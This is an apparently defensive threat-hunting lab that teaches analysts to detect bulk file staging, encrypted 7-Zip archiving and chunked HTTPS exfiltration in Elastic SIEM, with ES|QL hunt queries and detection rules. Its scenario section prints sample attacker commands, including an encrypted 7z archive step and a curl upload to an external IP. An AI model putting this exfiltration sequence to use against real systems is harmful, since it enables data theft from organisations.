Hunt Forward Lab #007 — Threat Hunting for Bulk File Transfer & Archive Creation | MITRE ATT&CK T1039, T1560.001, T1048.002
🔬 Difficulty: Intermediate — Estimated Time: 45–60 minutes 🗂️ MITRE ATT&CK: T1039 / T1560.001 / T1048.002 — Data from Network Shared Drive / Archive via Utility / Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Press enter or click to view image in full size
How to use this lab: Read the story to understand the attack. Then follow the Hunt section to find it yourself in Elastic SIEM. Document your findings in your Hunt Notebook as you go — you’ll use them to build your GitHub portfolio at the end.
Part 1 — The Scenario
1a — The Story Scene
Thursday afternoon. Meridian Financial’s SOC. 4:47 PM.
Alex Chen had been staring at the same DLP alert for six minutes when Marcus wheeled over.
“What’ve you got?”
“Nothing. That’s the problem.” She tilted the screen toward him. “DLP flagged a large outbound transfer to an external IP at 15:10. By the time the alert fired, the connection was already closed. The file is gone.”
Marcus studied the IP. “203.0.113.42. That’s the same C2 we saw last quarter.”
“Yeah.” Alex pulled up the endpoint timeline for WKSTN-MORGAN. "Morgan's machine. Service account — svc_emr_db. Which means someone with stolen credentials got onto a workstation and used a service account context to avoid triggering our user-behaviour baselines."
“Smart.” Marcus did not sound impressed. “What was transferred?”
“That’s what I’m trying to figure out. The DLP alert gives us the destination and the volume — 47 megabytes. It doesn’t tell us what 47 megabytes of data looked like before it left.”
That was the thing about data exfiltration. By the time most teams noticed it, the data was already gone. The only way to understand the scope — and answer the question every executive was going to ask in twenty minutes — was to work backwards. What files were accessed before the transfer? How were they packaged? How were they sent?
Alex opened a new ES|QL query and started at the beginning.
Now it’s your turn to find it.
1b — How Data Exfiltration Works — Simply Explained
Step 1: What attackers are actually trying to steal
After an attacker gets into a network — through phishing, stolen credentials, or lateral movement — their end goal is usually data. Financial records, patient files, intellectual property, credentials, employee PII. The data has value: for selling, for ransom leverage, or for competitive intelligence. But they can’t just walk out with a hard drive. They have to move the data across the network to somewhere they control, without triggering alerts designed to catch exactly that.
Step 2: The three phases every exfiltration attempt goes through
Attackers almost never upload raw files directly. They follow a three-step process that each leave their own tracks in your logs:
- Collection — bulk-reading or copying files from network shares to a local staging location. This is where the volume anomaly appears: one account reading dozens of sensitive files in minutes.
- Archiving — compressing and encrypting the staged files into a single archive using tools like 7-Zip or PowerShell’s
Compress-Archive. Encryption hides the contents from DLP inspection; compression reduces transfer time and volume. - Exfiltration — uploading the archive to an attacker-controlled server over HTTPS, making the traffic look like a normal encrypted web request.
The attacker’s advantage: each step looks almost normal in isolation. File access, archive creation, and HTTPS uploads all happen constantly in a healthy network. The signal is in the combination — and the statistical outliers.
Step 3: How the attack works
Normal file server activity (a single employee accessing one report):
User: a.chen | File: Q4_report.xlsx | Size: 280 KB | Process: EXCEL.EXE
Time: 09:15 → 09:16 | 1 file in ~60 secondsAttacker bulk-staging data (stolen service account):
User: svc_emr_db | Files: 35 files across EMR$, Finance$, HR$, Legal$
Sizes: 1 MB – 8 MB per file | Process: robocopy.exe
Time: 14:00 → 14:43 | 35 files in 43 minutes | ~47 MB totalThen: 7z.exe -tzip -p[password] -mhe=on → update_pkg.zip (45 MB encrypted)
Then: curl.exe POST https://203.0.113.42/api/upload (8 chunks × ~6 MB)What DLP sees vs what actually happened:
DLP alert: "Large outbound transfer: 47 MB to 203.0.113.42"
What it misses: 35 files read, 43 minutes of staging, 7z.exe with -mhe (header encryption)Step 4: Why defenders miss it
┌─────────────────────────────────────────────────────────────────────────────┐
│ WHAT SECURITY TOOLS SEE │
│ │
│ File access: svc_emr_db read 35 files — service accounts do this │
│ 7z.exe: compression utility — IT uses it for backups │
│ HTTPS upload: encrypted outbound traffic — indistinguishable from SaaS │
│ Total time: ~2 hours — spread thin enough to avoid rate alerts │
│ │
│ WHAT ACTUALLY HAPPENED │
│ │
│ 35 sensitive files read in 43 minutes — 50× normal rate for this account │
│ 7z.exe from AppData\Temp — not from Program Files (attacker-dropped tool) │
│ curl.exe from AppData\Temp — not a standard user workstation binary │
│ 8 uploads to same external IP — internal backup goes to 10.0.0.50, not │
│ 203.0.113.42 │
└─────────────────────────────────────────────────────────────────────────────┘Think of it like a warehouse with an inventory system. Every item that leaves has to be scanned out — but the system only flags individual items over a certain weight. An attacker who takes 35 medium-sized boxes, repackages them into one large crate labelled “equipment return,” and ships it out via the regular loading dock never triggers a single scan. The anomaly isn’t any one step. It’s the sequence.
Step 5: Why it leaves tracks
Exfiltration can’t hide the following statistical signatures — and each one is a hunt signal:
- Access rate spike — one account reading far more files per minute than its own historical baseline, especially across multiple sensitive share paths simultaneously
- Archive tool process in unexpected path —
7z.exeorCompress-Archivespawned fromAppData\TemporC:\Users\*\AppDatarather than a managed software directory - Asymmetric upload ratio — network connections where
bytes_outmassively exceedsbytes_in(uploads, not browsing); normal HTTPS traffic is the opposite - Single external destination, chunked volume — the same external IP receiving multiple large uploads in sequence, each sized just under a DLP threshold
None of that is a signature. But an analyst with the right ES|QL query can spot it in seconds. That’s exactly what you’re about to do.
Part 2 — Your Mission
By the end of this lab you will have:
- ✅ Detected a bulk file collection burst using file access rate analysis
- ✅ Found archive creation by an attacker-dropped 7-Zip binary in a suspicious path
- ✅ Identified chunked HTTPS exfiltration using upload-ratio anomaly detection
- ✅ Quantified the total data loss in megabytes
- ✅ Built a complete attack timeline from collection → archive → exfil → cleanup
- ✅ Documented the full investigation in your Hunt Notebook for your GitHub portfolio
Part 3 — Lab Setup
Getting Into the Lab
No manual Elastic setup required — Hunt Forward handles all of it.
- Go to hunt-forward.com
- Enter your email — Stripe checkout, card required, not charged for 7 days
- Dashboard unlocks immediately — all labs accessible
- Accept the Elastic Cloud invite → “Accept Invitation → Access SIEM”
- Check your dashboard status — Pending → ✓ Invite Sent within ~5 minutes
Once you’re in Elastic — CLICK HERE or:
- Kibana → Discover
- Index:
exfil-lab-logs - Time range: March 6, 2025, 10:00 AM — 6:00 PM
A Quick Word on ES|QL
Throughout this lab we use ES|QL — Elasticsearch Query Language — instead of clicking through visualisation menus. ES|QL lets you filter, group, count, and calculate statistics on your logs in a single query, directly in Discover.
Every ES|QL query starts with FROM and pipes data through commands using |. Think of each | as "then do this next thing to the results."
To run ES|QL in Kibana:
- In Discover, click the language selector dropdown (top left — it may say KQL or Lucene)
- Select ES|QL
- Paste the query and press Run (▶)
Part 4 — The Hunt
Hunt 1 — File Access Rate Spike (Bulk Collection)
The first signal in any exfiltration is the collection phase. Attackers need to stage data locally before they can archive and send it. That means one account reading a high volume of files in a short window — a rate that stands out against every other user on the file server.
The key insight: we’re not looking for a specific filename. We’re looking for abnormal access velocity from a single identity across multiple sensitive share paths.
FROM exfil-lab-logs
| WHERE event.category == "file"
AND event.action == "file-accessed"
| STATS
file_count = COUNT(*),
total_bytes = SUM(file.size),
unique_paths = COUNT_DISTINCT(file.path)
BY host.name, user.name, process.name
| EVAL total_mb = ROUND(total_bytes / 1048576.0, 2)
| WHERE file_count > 10
| SORT file_count DESC
| LIMIT 20What each line does:
FROM exfil-lab-logs— query the lab datasetWHERE event.category == "file" AND event.action == "file-accessed"— scope to file read events only, filtering out write and delete eventsSTATS file_count = COUNT(*), total_bytes = SUM(file.size), unique_paths = COUNT_DISTINCT(file.path) BY host.name, user.name, process.name— count how many files each user+host+process combination touched, sum the total bytes, and count distinct file paths to measure breadth of accessEVAL total_mb = ROUND(total_bytes / 1048576.0, 2)— convert raw bytes to megabytes inline, rounded to 2 decimal placesWHERE file_count > 10— filter out low-volume normal activity; focus on accounts that read more than 10 filesSORT file_count DESC— surface the highest-volume accessor firstLIMIT 20— return top 20 rows
What to look for in results: The top row should stand out dramatically from all others. Look for a user+process combination where file_count is 10× or more above the next row, where total_mb is in the tens of megabytes, and where process.name is something unexpected for file access — robocopy.exe instead of EXCEL.EXE or explorer.exe.
📝 Hunt Notebook checkpoint: Record the top anomalous row: user name, host name, process name, file count, and total MB accessed. Note whether the accessing process is a normal office application or a bulk-copy/scripting tool.
✅ Bulk collection confirmed.
svc_emr_dbonWKSTN-MORGANaccessed 75 files totalling ~47 MB viarobocopy.exe— vastly above any other user in the dataset. The process alone is a red flag:robocopy.exehas no legitimate reason to be running under a service account from a workstation.
Hunt 2 — Archive Creation in a Suspicious Path
The second signal is the archiving step. Legitimate compression tools like 7-Zip are installed by IT to C:\Program Files\7-Zip\7z.exe. An attacker who drops their own copy to AppData\Temp to avoid relying on IT-managed software is visible the moment you filter on the executable path.
Get Hunt Forward’s stories in your inbox
Join Medium for free to get updates from this writer.
We also look for password-protected compression (-p flag) and encrypted headers (-mhe=on) in the command line — features that have no use case in a legitimate backup or IT workflow.
FROM exfil-lab-logs
| WHERE event.category == "process"
AND (
process.name == "7z.exe"
OR process.name == "7za.exe"
OR process.command_line LIKE "*Compress-Archive*"
OR process.command_line LIKE "*-tzip*"
)
| EVAL suspicious_path = CASE(
process.executable LIKE "*\\\\AppData\\\\*", "YES — AppData",
process.executable LIKE "*\\\\Temp\\\\*", "YES — Temp",
process.executable LIKE "*\\\\ProgramData\\\\*", "YES — ProgramData",
"NO — managed path"
)
| EVAL has_password = CASE(
process.command_line LIKE "*-p*", "YES",
"NO"
)
| KEEP host.name, user.name, process.name, process.executable,
process.command_line, process.parent.name,
suspicious_path, has_password, @timestamp
| SORT @timestamp ASCWhat each line does:
WHERE event.category == "process" AND (...)— find any process event involving common archive utilities or PowerShell compression commandsEVAL suspicious_path = CASE(...)— derive a label field: flag the row if the archive tool is running fromAppData,Temp, orProgramData— directories where attackers drop tools to avoid IT software inventoriesEVAL has_password = CASE(...)— flag rows where the command line contains-p, indicating password-protected compressionKEEP ...— return only the fields relevant to this investigation, reducing noiseSORT @timestamp ASC— order by time so you can see the archive creation sequence as it happened
What to look for in results: Any row where suspicious_path = YES — AppData or similar is an immediate priority. Combine that with has_password = YES and you have a high-confidence archive creation event. Note the process.parent.name — if the archiver was spawned by cmd.exe or powershell.exe rather than an installer, that's a further indicator of attacker activity.
📝 Hunt Notebook checkpoint: Record the full
process.command_linefor any flagged row. Note the output filename in the command (the archive name the attacker chose), the executable path (confirms it's not a managed installation), and the password flag. The archive filename often reveals the attacker's masquerade strategy.✅ Rogue archive creation confirmed.
7z.exeran fromC:\Users\morgan\AppData\Local\Temp\7z.exe— attacker-dropped, not IT-managed — with flags-tzip -p3x!tr@c3d -mhe=on, creating a password-encrypted, header-encrypted ZIP. The output was namedWindowsDefender_Update_KB5034441.zipto masquerade as a Windows patch package.
Hunt 3 — Asymmetric Upload Detection (Exfiltration)
Normal HTTPS browsing is asymmetric in one direction: users download far more than they upload. A request to load a webpage sends a few hundred bytes out and receives megabytes back. When you see the pattern reversed — large bytes_out, tiny bytes_in — on an outbound HTTPS connection, that's an upload. When it's repeated, to a single external IP, in chunks, that's exfiltration.
FROM exfil-lab-logs
| WHERE event.category == "network"
AND network.direction == "outbound"
AND destination.port == 443
AND network.bytes_out IS NOT NULL
| EVAL mb_out = ROUND(network.bytes_out / 1048576.0, 2)
| EVAL mb_in = ROUND(network.bytes_in / 1048576.0, 2)
| EVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1)
| WHERE mb_out > 1.0
| STATS
transfer_count = COUNT(*),
total_mb_out = ROUND(SUM(network.bytes_out) / 1048576.0, 2),
avg_mb_per_transfer = ROUND(AVG(network.bytes_out) / 1048576.0, 2),
max_upload_ratio = MAX(upload_ratio)
BY host.name, user.name, destination.ip, process.name
| WHERE transfer_count >= 2
| SORT total_mb_out DESC
| LIMIT 15What each line does:
WHERE ... destination.port == 443 AND network.bytes_out IS NOT NULL— scope to HTTPS outbound connections that have byte-count telemetryEVAL mb_out = ROUND(network.bytes_out / 1048576.0, 2)— convert bytes sent to megabytesEVAL mb_in = ROUND(network.bytes_in / 1048576.0, 2)— convert bytes received to megabytesEVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1)— compute the ratio of sent to received; adding 1 to the denominator prevents division-by-zero; a ratio of 1000+ means the connection is almost entirely outboundWHERE mb_out > 1.0— filter out small requests; focus on transfers over 1 MBSTATS transfer_count = COUNT(*), total_mb_out = ROUND(SUM(...) / 1048576.0, 2), avg_mb_per_transfer = ..., max_upload_ratio = MAX(upload_ratio) BY host.name, user.name, destination.ip, process.name— group by destination IP and summarise: how many transfers, total volume, average chunk size, and peak ratioWHERE transfer_count >= 2— filter to destinations that received multiple large uploads (chunked exfil pattern)SORT total_mb_out DESC— surface the highest-volume destination first
What to look for in results: The top row should show a single external IP receiving multiple transfers with a massive total_mb_out value and a max_upload_ratio in the thousands. Cross-reference the destination IP against the C2 you found in earlier labs. The process.name of curl.exe on a standard user workstation is another high-confidence indicator — curl is a developer/admin tool rarely present on end-user machines.
📝 Hunt Notebook checkpoint: Record the destination IP, total MB exfiltrated, transfer count, average chunk size, and the process responsible. The
total_mb_outfigure is your data loss estimate — this number goes in the executive summary of your incident report.✅ Exfiltration confirmed.
curl.exeonWKSTN-MORGANsent 8 transfers totalling ~47 MB to203.0.113.42:443, with an average upload ratio of ~9,000:1 (near-zero response, massive upload). The destination IP matches the known C2 from the organisation's prior incidents.
Hunt 4 — Cleanup and Full Attack Scope
Attackers who clean up after themselves leave a different kind of evidence: file deletion events, directory removal, and a suspicious absence of the staging artefacts you’d expect to find. Correlating the cleanup events with the earlier signals confirms the full attack chain and gives you precise timestamps for your timeline.
FROM exfil-lab-logs
| WHERE host.name == "WKSTN-MORGAN"
AND (
(event.category == "file" AND event.action IN ("file-created", "file-deleted", "directory-deleted", "file-renamed"))
OR (event.category == "process" AND process.name IN ("7z.exe", "robocopy.exe", "curl.exe", "cmd.exe"))
)
| EVAL event_label = CASE(
event.action == "file-accessed" AND process.name == "robocopy.exe", "1-COLLECTION",
process.name == "7z.exe", "2-ARCHIVE",
event.action == "file-renamed", "2-MASQUERADE",
process.name == "curl.exe", "3-EXFILTRATION",
event.action IN ("file-deleted", "directory-deleted"), "4-CLEANUP",
"OTHER"
)
| KEEP @timestamp, event_label, event.action, file.name, file.path,
process.name, process.command_line, user.name
| SORT @timestamp ASC
| LIMIT 50What each line does:
WHERE host.name == "WKSTN-MORGAN"— scope entirely to the compromised host identified in Hunts 1–3AND (...)— filter to file creation/deletion events and the specific attacker processes we've confirmedEVAL event_label = CASE(...)— derive a phase label for each event: assigns "1-COLLECTION", "2-ARCHIVE", "3-EXFILTRATION", or "4-CLEANUP" based on the action and process name, so the results read as a timeline rather than a raw event listKEEP ...— surface only the fields needed to reconstruct the timelineSORT @timestamp ASC— chronological order, earliest to latest
What to look for in results: You should see a clean four-phase progression: collection events (robocopy file accesses) → archive creation (7z.exe) and rename → exfiltration (curl.exe uploads) → cleanup (file and directory deletions). Any gaps in the sequence are worth noting. The cleanup events confirm the attacker had operational security awareness — they didn’t just leave artefacts behind.
📝 Hunt Notebook checkpoint: Record the timestamp of the first collection event, the archive creation timestamp, the first and last upload timestamps, and the cleanup timestamp. Calculate the total attack window (first collection to last cleanup). Note the archive name used as a masquerade, and record all deleted files and directories as forensic artefacts that are no longer recoverable from the endpoint.
✅ Full attack chain confirmed. Four-phase exfiltration: collection (14:00–14:43) → archive + masquerade (14:45) → chunked HTTPS upload (15:10–15:58) → cleanup (16:05). Total window: ~2 hours. Total data loss: ~47 MB. Evidence of operational security: attacker renamed archive to a Windows patch filename and deleted all staging artefacts on exit.
Part 5 — Building Your Timeline
┌─[WKSTN-MORGAN — Data Exfiltration Timeline]─────────────────────────────────────────┐
│ TIME (UTC) │ EVENT │ PHASE │
│───────────────┼───────────────────────────────────────────┼──────────────────────────│
│ 14:00 │ robocopy.exe launched by svc_emr_db │ Collection begins │
│ 14:00–14:43 │ 35 files read from EMR$, Finance$, HR$ │ Bulk staging (~47 MB) │
│ 14:43 │ robocopy.exe exits │ Staging complete │
│ 14:45 │ 7z.exe (AppData\Temp) creates archive │ Archive + encryption │
│ 14:45:47 │ update_pkg.zip created (45 MB) │ Compressed payload │
│ 14:45:55 │ Renamed → WindowsDefender_Update_KB*.zip │ Masquerade applied │
│ 15:08 │ curl.exe dropped to AppData\Temp │ Transfer tool staged │
│ 15:10 │ Upload chunk 1/8 → 203.0.113.42:443 │ Exfiltration begins │
│ 15:10–15:58 │ 8 × ~6 MB HTTPS POST chunks │ 47 MB exfiltrated │
│ 16:05 │ update_pkg.zip deleted │ Cleanup begins │
│ 16:05 │ staging\ directory removed │ Evidence destruction │
│ 16:07 │ curl.exe deleted │ Tool removed │
└─────────────────────────────────────────────────────────────────────────────────────┘Part 6 — Document Your Hunt (Hunt Notebook → GitHub Portfolio)
Open your Hunt Notebook in the Hunt Forward dashboard. The pre-loaded template has every section ready for your findings.
Option A — Write your own report: Merge your four Hunt Notebook milestone blocks into a single document. Add a cover section:
- Analyst name and date
- Executive summary: what was stolen, from which host, via which account, total data volume
- IOC table:
svc_emr_db,WKSTN-MORGAN,203.0.113.42,C:\Users\morgan\AppData\Local\Temp\7z.exe,C:\Users\morgan\AppData\Local\Temp\curl.exe, archive filename - Recommended remediation: isolate
WKSTN-MORGAN, revokesvc_emr_dbcredentials, block203.0.113.42at perimeter, notify legal/compliance of ~47 MB potential PII exposure
Export as markdown → push to GitHub as hunt-007-data-exfiltration-detection.md
Option B — Download the Hunt Forward reference report: Use it to check your findings before writing your own version.
The recommendation: Write your own. The data loss quantification you produced in Hunt 3 — a specific megabyte figure, a named external IP, a confirmed process — is exactly the kind of evidence a CISO asks for in a breach notification decision. The fact that you can walk an interviewer through how you calculated it, line by line, is what makes this portfolio piece real.
Part 7 — What Alex Did Next
The executive summary took eleven minutes. 47 MB from EMR$, Finance$, HR$, and Legal$ — patient records, payroll data, wire transfer accounts, pending litigation files. The legal team was on the phone before Alex had finished typing the IOC table. Marcus submitted the containment ticket for WKSTN-MORGAN and the credential revocation for svc_emr_db simultaneously.
The DLP alert that started it all had fired forty-seven minutes after the first file was read. Alex added a note to the runbook: next time someone with a service account touches robocopy, don’t wait for DLP to tell you.
Part 8 — Operationalise Your Hunts as Detection Rules
Hunting manually is how you find the first incident. Detection rules are how you make sure the next analyst doesn’t have to start from scratch.
Each ES|QL query you ran in Part 4 can be turned into a standing rule in Elastic Security that fires automatically when the same pattern appears. Import the three rules below and they will run every 5 minutes against your exfil-lab-logs index — or swap the index name for your production data source.
To import: Elastic Security → Detection Rules → Import rules → select the .ndjson file from your Hunt Forward dashboard.
Rule 1 — Bulk File Collection via Network Share (HIGH)
Fires when a single account reads more than 20 files totalling over 10 MB using a bulk-copy process. Legitimate users access individual files on demand; this rate indicates automated staging.
FROM exfil-lab-logs*
| WHERE event.category == "file"
AND event.action == "file-accessed"
AND process.name IN ("robocopy.exe", "xcopy.exe", "cmd.exe", "powershell.exe")
| STATS
file_count = COUNT(*),
total_bytes = SUM(file.size),
unique_paths = COUNT_DISTINCT(file.path)
BY host.name, user.name, process.name
| EVAL total_mb = ROUND(total_bytes / 1048576.0, 2)
| WHERE file_count > 20
AND total_mb > 10
| SORT total_mb DESCWhen this fires: Pivot to Hunt 1. Check whether 7z.exe or archive activity follows within 30 minutes — if Rule 2 also fires for the same host, you have a confirmed collection-to-archive sequence. Record total_mb in your Elastic Security Case as the staging volume estimate.
False positives to validate: Scheduled backup agents (BackupExec, Veeam) running under a known service account; IT mass file migrations during change-management windows.
Rule 2 — Archive Creation from Suspicious Path (HIGH)
Fires when 7-Zip or PowerShell Compress-Archive runs from a user-writable directory (AppData, Temp, ProgramData) rather than a managed installation path. Attacker-dropped archive tools live in user-writable directories to avoid software inventory detection. Password flags (-p, -mhe) indicate deliberate encryption to defeat DLP content inspection.
FROM exfil-lab-logs*
| WHERE event.category == "process"
AND (
process.name == "7z.exe"
OR process.name == "7za.exe"
OR process.command_line LIKE "*Compress-Archive*"
)
| EVAL suspicious_path = CASE(
process.executable LIKE "*\\\\AppData\\\\*", "YES",
process.executable LIKE "*\\\\Temp\\\\*", "YES",
process.executable LIKE "*\\\\ProgramData\\\\*","YES",
"NO"
)
| EVAL has_password = CASE(
process.command_line LIKE "*-p*", "YES",
"NO"
)
| WHERE suspicious_path == "YES"
| KEEP @timestamp, host.name, user.name, process.name,
process.executable, process.command_line,
process.parent.name, suspicious_path, has_password
| SORT @timestamp ASCWhen this fires: Inspect the full process.command_line for the output archive path and filename — attackers frequently rename archives to mimic Windows patch packages (KB*.zip) or system files. Correlate with Rule 1 (bulk collection) and Rule 3 (asymmetric upload) to confirm the full exfiltration chain.
False positives to validate: Developers using portable 7-Zip builds in project directories; IT scripts that compress logs or reports using system PowerShell — review parent process and output path before dismissing.
Rule 3 — Chunked HTTPS Exfiltration — Asymmetric Upload (CRITICAL)
Fires when the same external IP receives 2 or more large HTTPS transfers totalling over 5 MB with an upload ratio above 100:1. Normal browsing sends small requests and receives large responses — exfiltration reverses this. Chunked transfers to a single destination indicate deliberate splitting to stay under DLP byte thresholds.
FROM exfil-lab-logs*
| WHERE event.category == "network"
AND network.direction == "outbound"
AND destination.port == 443
AND network.bytes_out IS NOT NULL
| EVAL mb_out = ROUND(network.bytes_out / 1048576.0, 2)
| EVAL upload_ratio = ROUND(network.bytes_out / (network.bytes_in + 1), 1)
| WHERE mb_out > 1.0
| STATS
transfer_count = COUNT(*),
total_mb_out = ROUND(SUM(network.bytes_out) / 1048576.0, 2),
avg_mb_per_xfer = ROUND(AVG(network.bytes_out) / 1048576.0, 2),
max_ratio = MAX(upload_ratio)
BY host.name, user.name, destination.ip, process.name
| WHERE transfer_count >= 2
AND total_mb_out > 5
AND max_ratio > 100
| SORT total_mb_out DESCWhen this fires: The total_mb_out value is your data loss estimate for executive reporting — record it in your Elastic Security Case immediately. Add destination.ip as a network IOC. If Rules 1 and 2 also fired for the same host within the preceding 2 hours, treat this as a confirmed exfiltration chain and escalate to critical incident response.
False positives to validate: Cloud backup agents (Acronis, CrashPlan, Backblaze) uploading to known endpoints — add backup destination IPs to an exception list; large file sharing via approved SaaS (SharePoint, Dropbox, Box) — validate destination IP against known SaaS CIDR ranges.
Press enter or click to view image in full size
Ready for the Next Lab?
- Lab #008 — Insider Threat Detection: Hunting behavioural baselines when the attacker already has legitimate credentials
New labs drop 2–3 times per week on Hunt Forward and Medium.